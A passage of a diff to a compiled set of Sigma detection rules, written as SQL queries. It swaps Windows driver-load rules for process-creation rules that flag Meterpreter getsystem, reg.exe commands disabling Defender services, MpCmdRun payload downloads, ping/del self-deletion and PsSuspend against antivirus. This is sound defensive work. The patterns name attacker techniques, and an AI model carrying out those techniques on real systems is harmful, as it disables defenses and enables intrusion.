"filename": "proc_creation_win_pua_netcat.yml" }, { - "title": "PowerShell Scripts Run by a Services", - "id": "46deb5e1-28c9-4905-b2df-51cdcc9e6073", + "title": "Potential Meterpreter/CobaltStrike Activity", + "id": "15619216-e993-4721-b590-4c520615a67d", "status": "test", - "description": "Detects powershell script installed as a Service", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting", + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.privilege_escalation", + "attack.t1134.001", + "attack.t1134.002" ], "falsepositives": [ - "Unknown" + "Commandlines containing components like cmd accidentally", + "Jobs and services started with cmd" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%powershell%' ESCAPE '\\' OR ImageLoaded LIKE '%pwsh%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%\\\\pipe\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%cmd%' ESCAPE '\\' OR CommandLine LIKE '%\\%COMSPEC\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%.dll,a%' ESCAPE '\\' AND CommandLine LIKE '%/p:%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%MpCmdRun%' ESCAPE '\\')))" ], - "filename": "driver_load_win_powershell_script_installed_as_service.yml" + "filename": "proc_creation_win_hktl_meterpreter_getsystem.yml" }, { - "title": "WinDivert Driver Load", - "id": "679085d5-f427-4484-9f58-1dc30a7c426d", + "title": "Reg Disable Security Service", + "id": "5e95028c-5229-4214-afae-d653d573d0ec", "status": "experimental", - "description": "Detects the load of the Windiver driver, a powerful user-mode 
capture/sniffing/modification/blocking/re-injection package for Windows", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a suspicious reg.exe invocation that looks as if it would disable an important security service", + "author": "Florian Roth (Nextron Systems), John Lambert (idea), elhoim", "tags": [ - "attack.collection", "attack.defense_evasion", - "attack.t1599.001", - "attack.t1557.001" + "attack.t1562.001" ], "falsepositives": [ - "Legitimate WinDivert driver usage" + "Unknown", + "Other security solution installers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\WinDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinDivert64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NordDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lingtiwfp.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eswfp.sys%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=0604bb7cb4bb851e2168d5c7d9399087%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2e5f0e649d97f32b03c09e4686d0574f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=52f8aa269f69f0edad9e8fcdaedce276%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c0e5d314da39dbf65a2dbff409cc2c76%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=58623490691babe8330adc81cd04a663%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8ee39b48656e4d6b8459d7ba7da7438b%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=45ee545ae77e8d43fc70ede9efcd4c96%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a1b2e245acd47e4a348e1a552a02859a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2a5f85fe4609461c6339637594fa9b0a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6b2c6f95233c2914d1d488ee27531acc%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9f2fdd3f9ab922bbb0560a7df46f4342%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=d8a719865c448b1bd2ec241e46ac1c88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0ea54f8c9af4a2fe8367fa457f48ed38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9d519ae0a0864d6d6ae3f8b6c9c70af6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a74929edfc3289895e3f2885278947ae%' ESCAPE '\\' OR Hashes LIKE 
'%IMPHASH=a66b476c2d06c370f0a53b5537f2f11e%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bdcd836a46bc2415773f6b5ea77a46e4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c28cd6ccd83179e79dac132a553693d9%' ESCAPE '\\') OR Imphash IN ('0604bb7cb4bb851e2168d5c7d9399087', '2e5f0e649d97f32b03c09e4686d0574f', '52f8aa269f69f0edad9e8fcdaedce276', 'c0e5d314da39dbf65a2dbff409cc2c76', '58623490691babe8330adc81cd04a663', '8ee39b48656e4d6b8459d7ba7da7438b', '45ee545ae77e8d43fc70ede9efcd4c96', 'a1b2e245acd47e4a348e1a552a02859a', '2a5f85fe4609461c6339637594fa9b0a', '6b2c6f95233c2914d1d488ee27531acc', '9f2fdd3f9ab922bbb0560a7df46f4342', 'd8a719865c448b1bd2ec241e46ac1c88', '0ea54f8c9af4a2fe8367fa457f48ed38', '9d519ae0a0864d6d6ae3f8b6c9c70af6', 'a74929edfc3289895e3f2885278947ae', 'a66b476c2d06c370f0a53b5537f2f11e', 'bdcd836a46bc2415773f6b5ea77a46e4', 'c28cd6ccd83179e79dac132a553693d9'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') AND ((CommandLine LIKE '% /d 4%' ESCAPE '\\' AND CommandLine LIKE '% /v Start%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Sense%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsMpSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\NisSrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdBoot%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisDrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wscsvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SecurityHealthService%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wuauserv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\UsoSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdFilter%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppIDSvc%' ESCAPE '\\')) OR (CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Windows Defender%' ESCAPE '\\' AND (CommandLine LIKE '%DisableIOAVProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableOnAccessProtection%' ESCAPE '\\' OR CommandLine LIKE 
'%DisableRoutinelyTakingAction%' ESCAPE '\\' OR CommandLine LIKE '%DisableScanOnRealtimeEnable%' ESCAPE '\\' OR CommandLine LIKE '%DisableBlockAtFirstSeen%' ESCAPE '\\' OR CommandLine LIKE '%DisableBehaviorMonitoring%' ESCAPE '\\' OR CommandLine LIKE '%DisableEnhancedNotifications%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpyware%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpywareRealtimeProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableConfig%' ESCAPE '\\' OR CommandLine LIKE '%DisablePrivacyMode%' ESCAPE '\\' OR CommandLine LIKE '%SignatureDisableUpdateOnStartupWithoutEngine%' ESCAPE '\\' OR CommandLine LIKE '%DisableArchiveScanning%' ESCAPE '\\' OR CommandLine LIKE '%DisableIntrusionPreventionSystem%' ESCAPE '\\' OR CommandLine LIKE '%DisableScriptScanning%' ESCAPE '\\'))))" ], - "filename": "driver_load_win_windivert.yml" + "filename": "proc_creation_win_reg_disable_sec_services.yml" }, { - "title": "Vulnerable AVAST Anti Rootkit Driver Load", - "id": "7c676970-af4f-43c8-80af-ec9b49952852", - "status": "experimental", - "description": "Detects the load of a signed and vulnerable AVAST Anti Rootkit driver often used by threat actors or malware for stopping and disabling AV and EDR products", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Windows Defender Download Activity", + "id": "46123129-1024-423e-9fae-43af4a0fa9a5", + "status": "test", + "description": "Detect the use of Windows Defender to download payloads", + "author": "Matthew Matchen", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1218", + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((Hashes LIKE '%MD5=a179c4093d05a3e1ee73f6ff07f994aa%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1%' ESCAPE 
'\\') OR md5 = 'a179c4093d05a3e1ee73f6ff07f994aa' OR sha1 = '5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4' OR sha256 = '4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1') OR (ImageLoaded LIKE '%\\\\aswArPot.sys' ESCAPE '\\' AND (Signed = 'false' OR SignatureStatus = 'Expired')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%MpCmdRun.exe%' ESCAPE '\\' OR Description = 'Microsoft Malware Protection Command Line Utility') AND (CommandLine LIKE '%DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%url%' ESCAPE '\\'))" ], - "filename": "driver_load_win_vuln_avast_anti_rootkit_driver.yml" + "filename": "proc_creation_win_lolbin_susp_mpcmdrun_download.yml" }, { - "title": "Vulnerable Dell BIOS Update Driver Load", - "id": "21b23707-60d6-41bb-96e3-0f0481b0fed9", + "title": "Suspicious Ping/Del Command Combination", + "id": "54786ddc-5b8a-11ed-9b6a-0242ac120002", "status": "experimental", - "description": "Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a method often used by ransomware. Which combines the \"ping\" to wait a couple of seconds and then \"del\" to delete the file in question. 
Its used to hide the file responsible for the initial infection for example", + "author": "Ilya Krestinichev", "tags": [ - "attack.privilege_escalation", - "cve.2021.21551", - "attack.t1543", - "attack.t1068" + "attack.defense_evasion", + "attack.t1070.004" ], "falsepositives": [ - "Legitimate BIOS driver updates (should be rare)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\DBUtil\\_2\\_3.Sys%' ESCAPE '\\' OR (Hashes LIKE '%SHA256=0296E2CE999E67C76352613A718E11516FE1B0EFC3FFDB8918FC999DD76A73A5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=DDBF5ECCA5C8086AFDE1FB4F551E9E6400E94F4428FE7FB5559DA5CFFA654CC1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C948AE14761095E4D76B55D9DE86412258BE7AFD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=10B30BDEE43B3A2EC4AA63375577ADE650269D25%' ESCAPE '\\' OR Hashes LIKE '%MD5=C996D7971C49252C582171D9380360F2%' ESCAPE '\\' OR Hashes LIKE '%MD5=D2FD132AB7BBC6BBB87A84F026FA0244%' ESCAPE '\\') OR sha256 IN ('0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5', 'ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1') OR sha1 IN ('c948ae14761095e4d76b55d9de86412258be7afd', '10b30bdee43b3a2ec4aa63375577ade650269d25') OR md5 IN ('c996d7971c49252c582171d9380360f2', 'd2fd132ab7bbc6bbb87a84f026fa0244'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -n %' ESCAPE '\\' OR CommandLine LIKE '% /n %' ESCAPE '\\') AND CommandLine LIKE '%Nul%' ESCAPE '\\' AND (CommandLine LIKE '% /f %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% /q %' ESCAPE '\\' OR CommandLine LIKE '% -q %' ESCAPE '\\') AND CommandLine LIKE '%ping%' ESCAPE '\\' AND CommandLine LIKE '%del %' ESCAPE '\\')" ], - "filename": "driver_load_win_vuln_dell_driver.yml" + "filename": "proc_creation_win_cmd_ping_del_combined_execution.yml" }, { - "title": "Credential Dumping Tools Service Execution", - "id": "df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2", - "status": "test", 
- "description": "Detects well-known credential dumping tools execution via service execution events", - "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "title": "Sysinternals PsSuspend Suspicious Execution", + "id": "4beb6ae0-f85b-41e2-8f18-8668abc8af78", + "status": "experimental", + "description": "Detects suspicious execution of Sysinternals PsSuspend, where the utility is used to suspend critical processes such as AV or EDR to bypass defenses", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006", - "attack.t1569.002", - "attack.s0005" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate Administrator using credential dumping tool for password recovery" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%fgexec%' ESCAPE '\\' OR ImageLoaded LIKE '%dumpsvc%' ESCAPE '\\' OR ImageLoaded LIKE '%cachedump%' ESCAPE '\\' OR ImageLoaded LIKE '%mimidrv%' ESCAPE '\\' OR ImageLoaded LIKE '%gsecdump%' ESCAPE '\\' OR ImageLoaded LIKE '%servpw%' ESCAPE '\\' OR ImageLoaded LIKE '%pwdump%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'pssuspend.exe' OR (NewProcessName LIKE '%\\\\pssuspend.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pssuspend64.exe' ESCAPE '\\')) AND CommandLine LIKE '%msmpeng.exe%' ESCAPE '\\')" ], - "filename": "driver_load_win_mal_creddumper.yml" + "filename": "proc_creation_win_sysinternals_pssuspend_susp_execution.yml" }, { - "title": "Vulnerable Driver Load", - "id": "7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8", + "title": "Parent in Public Folder Suspicious Process", + "id": "69bd9b97-2be2-41b6-9816-fb08757a4d1a", "status": "experimental", - "description": "Detects the 
load of known vulnerable drivers by hash value", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1068" - ], + "description": "This rule detects suspicious processes with parent images located in the C:\\Users\\Public folder", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Hashes LIKE '%SHA1=2261198385d62d2117f50f631652eded0ecc71db%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8db869c0674221a2d3280143cbb0807fac08e0cc%' ESCAPE '\\' OR Hashes LIKE '%SHA1=27d3ebea7655a72e6e8b95053753a25db944ec0f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=33cdab3bbc8b3adce4067a1b042778607dce2acd%' ESCAPE '\\' OR Hashes LIKE '%SHA1=21e6c104fe9731c874fab5c9560c929b2857b918%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d979353d04bf65cc92ad3412605bc81edbb75ec2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2f991435a6f58e25c103a657d24ed892b99690b8%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f02af84393e9627ba808d4159841854a6601cf80%' ESCAPE '\\' OR Hashes LIKE '%SHA1=bb962c9a8dda93e94fef504c4159de881e4706fe%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b97a8d506be2e7eaa4385f70c009b22adbd071ba%' ESCAPE '\\' OR Hashes LIKE '%SHA1=92f251358b3fe86fd5e7aa9b17330afa0d64a705%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8b6aa5b2bff44766ef7afbe095966a71bc4183fa%' ESCAPE '\\' OR Hashes LIKE '%SHA1=af6e1f2cfb230907476e8b2d676129b6d6657124%' ESCAPE '\\' OR Hashes LIKE '%SHA1=fcde5275ee1913509927ce5f0f85e6681064c9d2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=00a442a4305c62cefa8105c0b4c4a9a5f4d1e93b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6523b3fd87de39eb5db1332e4523ce99556077dc%' ESCAPE '\\' OR Hashes LIKE '%SHA1=72966ca845759d239d09da0de7eebe3abe86fee3%' ESCAPE '\\' OR Hashes LIKE '%SHA1=57511ef5ff8162a9d793071b5bf7ebe8371759de%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2d503a2457a787014a1fdd48a2ece2e6cbe98ea7%' ESCAPE '\\' OR Hashes LIKE '%SHA1=400f833dcc2ef0a122dd0e0b1ec4ec929340d90e%' ESCAPE '\\' OR Hashes 
LIKE '%SHA1=89cd760e8cb19d29ee08c430fb17a5fd4455c741%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1d0df45ee3fa758f0470e055915004e6eae54c95%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d5fd9fe10405c4f90235e583526164cd0902ed86%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c52cef5b9e1d4a78431b7af56a6fdb6aa1bcad65%' ESCAPE '\\' OR Hashes LIKE '%SHA1=609fa1efcf61e26d64a5ceb13b044175ab2b3a13%' ESCAPE '\\' OR Hashes LIKE '%SHA1=7d7c03e22049a725ace2a9812c72b53a66c2548b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f9519d033d75e1ab6b82b2e156eafe9607edbcfb%' ESCAPE '\\' OR Hashes LIKE '%SHA1=468e2e5505a3d924b14fedee4ddf240d09393776%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2e3de9bff43d7712707ef8a0b10f7e4ad8427fd8%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c9cbfdd0be7b35751a017ec59ff7237ffdc4df1f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=078ae07dec258db4376d5a2a05b9b508d68c0123%' ESCAPE '\\' OR Hashes LIKE '%SHA1=623cd2abef6c92255f79cbbd3309cb59176771da%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1f3a9265963b660392c4053329eb9436deeed339%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4a235f0b84ff615e2879fa9e0ec0d745fcfdaa5c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ace6b9e34e3e2e73fe584f3bbdb4e4ec106e0a7d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4268f30b79ce125a81d0d588bef0d4e2ad409bbb%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c834c4931b074665d56ccab437dfcc326649d612%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8f5cd4a56e6e15935491aa40adb1ecad61eafe7c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=51b60eaa228458dee605430aae1bc26f3fc62325%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3270720a066492b046d7180ca6e60602c764cac7%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2a6e6bd51c7062ad24c02a4d2c1b5e948908d131%' ESCAPE '\\' OR Hashes LIKE '%SHA1=19bd488fe54b011f387e8c5d202a70019a204adf%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a6fe4f30ca7cb94d74bc6d42cdd09a136056952e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ea877092d57373cb466b44e7dbcad4ce9a547344%' ESCAPE '\\' OR Hashes LIKE '%SHA1=205c69f078a563f54f4c0da2d02a25e284370251%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f9feb60b23ca69072ce42264cd821fe588a186a6%' ESCAPE '\\' OR 
Hashes LIKE '%SHA1=b25170e09c9fb7c0599bfba3cf617187f6a733ac%' ESCAPE '\\' OR Hashes LIKE '%SHA1=160c96b5e5db8c96b821895582b501e3c2d5d6e7%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a2e0b3162cfa336cd4ab40a2acc95abe7dc53843%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4e826430a1389032f3fe06e2cc292f643fb0c417%' ESCAPE '\\' OR Hashes LIKE '%SHA1=7ab4565ba24268f0adadb03a5506d4eb1dc7c181%' ESCAPE '\\' OR Hashes LIKE '%SHA1=dc7b022f8bd149efbcb2204a48dce75c72633526%' ESCAPE '\\' OR Hashes LIKE '%SHA1=0307d76750dd98d707c699aee3b626643afb6936%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5711c88e9e64e45b8fc4b90ab6f2dd6437dc5a8a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6714380bc0b8ab09b9a0d2fa66d1b025b646b946%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8626ab1da6bfbdf61bd327eb944b39fd9df33d1d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=30a224b22592d952fbe2e6ad97eda4a8f2c734e0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c95db1e82619fb16f8eec9a8209b7b0e853a4ebe%' ESCAPE '\\' OR Hashes LIKE '%SHA1=fe1d909ab38de1389a2a48352fd1c8415fd2eab0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b4d1554ec19504215d27de0758e13c35ddd6db3e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5dd2c31c4357a8b76db095364952b3d0e3935e1d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ecb4d096a9c58643b02f328d2c7742a38e017cf0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4a705af959af61bad48ef7579f839cb5ebd654d2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d2e6fc9259420f0c9b6b1769be3b1f63eb36dc57%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c948ae14761095e4d76b55d9de86412258be7afd%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ddbe809b731a0962e404a045ab9e65a0b64917ad%' ESCAPE '\\' OR Hashes LIKE '%SHA1=745bad097052134548fe159f158c04be5616afc2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8d59fd14a445c8f3f0f7991fa6cd717d466b3754%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2dfcb799b3c42ecb0472e27c19b24ac7532775ce%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cc51be79ae56bc97211f6b73cc905c3492da8f9d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ac13941f436139b909d105ad55637e1308f49d9a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2b0bb408ff0e66bcdf6574f1ca52cbf4015b257b%' ESCAPE '\\' 
OR Hashes LIKE '%SHA1=cc0e0440adc058615e31e8a52372abadf658e6b1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5520ac25d81550a255dc16a0bb89d4b275f6f809%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6afc6b04cf73dd461e4a4956365f25c1f1162387%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4b009e91bae8d27b160dc195f10c095f8a2441e1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6003184788cd3d2fc624ca801df291ccc4e225ee%' ESCAPE '\\' OR Hashes LIKE '%SHA1=0466e90bf0e83b776ca8716e01d35a8a2e5f96d3%' ESCAPE '\\' OR Hashes LIKE '%SHA1=e6305dddd06490d7f87e3b06d09e9d4c1c643af0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=89909fa481ff67d7449ee90d24c167b17b0612f1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d7e8aef8c8feb87ce722c0b9abf34a7e6bab6eb4%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5e6ddd2b39a3de0016385cbd7aa50e49451e376d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=976777d39d73034df6b113dfce1aa6e1d00ffcfd%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9c6749fc6c1127f8788bff70e0ce9062959637c9%' ESCAPE '\\' OR Hashes LIKE '%SHA1=53acd4d9e7ba0b1056cf52af0d191f226eddf312%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3abb9d0a9d600200ae19c706e570465ef0a15643%' ESCAPE '\\' OR Hashes LIKE '%SHA1=27eab595ec403580236e04101172247c4f5d5426%' ESCAPE '\\' OR Hashes LIKE '%SHA1=78b9481607ca6f3a80b4515c432ddfe6550b18a8%' ESCAPE '\\' OR Hashes LIKE '%SHA1=414cd15d6c991d19fb5be02e3b9fb0e6c5ce731c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d9c09dd725bc7bc3c19b4db37866015817a516ef%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9c256edd10823ca76c0443a330e523027b70522d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=35829e096a15e559fcbabf3441d99e580ca3b26e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b8de3a1aeeda9deea43e3f768071125851c85bd0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=054a50293c7b4eea064c91ef59cf120d8100f237%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d94f2fb3198e14bfe69b44fb9f00f2551f7248b2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=01a578a3a39697c4de8e3dab04dba55a4c35163e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=14bf0eaa90e012169745b3e30c281a327751e316%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f50c6b84dfb8f2d53ba3bce000a55f0a486c0e79%' ESCAPE 
'\\' OR Hashes LIKE '%SHA1=6100eb82a25d64a7a7702e94c2b21333bc15bd08%' ESCAPE '\\' OR Hashes LIKE '%SHA1=bf87e32a651bdfd9b9244a8cf24fca0e459eb614%' ESCAPE '\\' OR Hashes LIKE '%SHA1=28b1c0b91eb6afd2d26b239c9f93beb053867a1a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=879fcc6795cebe67718388228e715c470de87dca%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1f7501e01d84a2297c85cb39880ec4e40ac3fe8a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=152b6bb9ffd2ffec00cc46f5c6e29362d0e66e67%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5f8356ffa8201f338dd2ea979eb47881a6db9f03%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a7bd05de737f8ea57857f1e0845a25677df01872%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cce9b82f01ec68f450f5fe4312f40d929c6a506e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=e35a2b009d54e1a0b231d8a276251f64231b66a3%' ESCAPE '\\' OR Hashes LIKE '%SHA1=37364cb5f5cefd68e5eca56f95c0ab4aff43afcc%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d62fa51e520022483bdc5847141658de689c0c29%' ESCAPE '\\' OR Hashes LIKE '%SHA1=93aa3bb934b74160446df3a47fa085fd7f3a6be9%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ec4cc6de4c779bb1ca1dd32ee3a03f7e8d633a9b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=35f1ba60ba0da8512a0b1b15ee8e30fe240d77cd%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3805e4e08ad342d224973ecdade8b00c40ed31be%' ESCAPE '\\' OR Hashes LIKE '%SHA1=65d8a7c2e867b22d1c14592b020c548dd0665646%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c8d87f3cd34c572870e63a696cf771580e6ea81b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c4d7fb9db3c3459f7e8c0e3d48c95c7c9c4cff60%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d34a7c497c603f3f7fcad546dc4097c2da17c430%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1fd7f881ea4a1dbb5c9aeb9e7ad659a85421745b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=0b8b83f245d94107cb802a285e6529161d9a834d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c969f1f73922fd95db1992a5b552fbc488366a40%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ac600a2bc06b312d92e649b7b55e3e91e9d63451%' ESCAPE '\\' OR Hashes LIKE '%SHA1=da9cea92f996f938f699902482ac5313d5e8b28e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=33285b2e97a0aeb317166cce91f6733cf9c1ad53%' 
